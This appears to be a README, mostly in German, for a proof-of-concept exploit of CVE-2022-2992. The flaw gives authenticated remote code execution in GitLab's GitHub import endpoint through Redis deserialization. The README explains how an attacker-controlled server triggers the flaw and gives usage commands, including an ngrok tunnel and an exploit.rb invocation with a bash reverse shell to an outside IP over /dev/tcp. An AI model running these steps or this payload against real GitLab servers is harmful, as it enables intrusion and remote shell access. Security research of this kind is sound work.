
A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.
Beschreibung: Dies ermöglicht einem authentifizierten Benutzer, über den Import-von-GitHub-API-Endpunkt eine Remote-Codeausführung zu erreichen.
Betroffene Versionen: alle Versionen von 11.10 vor 15.1.6, 15.2 bis 15.2.4, 15.3 bis 15.3.2
Behobene Version: 15.3.2
Forscher: vakzz
Write-up-Link: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST-CVE-Link: https://nvd.nist.gov/vuln/detail/CVE-2022-2992
Ein authentifizierter Benutzer kann ein Repository von Github in Gitlab importieren. Man kann versuchen, von einem Controller-Server des Angreifers zu importieren, der mit einem Redis-Serialisierungsprotokoll-Objekt im verschachtelten default_branch antwortet, wodurch Gitlab dieses Objekt in Redis zwischenspeichert und Redis es deserialisiert und die Ausführung der Payload auslöst.
Man benötigt ein persönliches Zugriffstoken
$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567 # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload
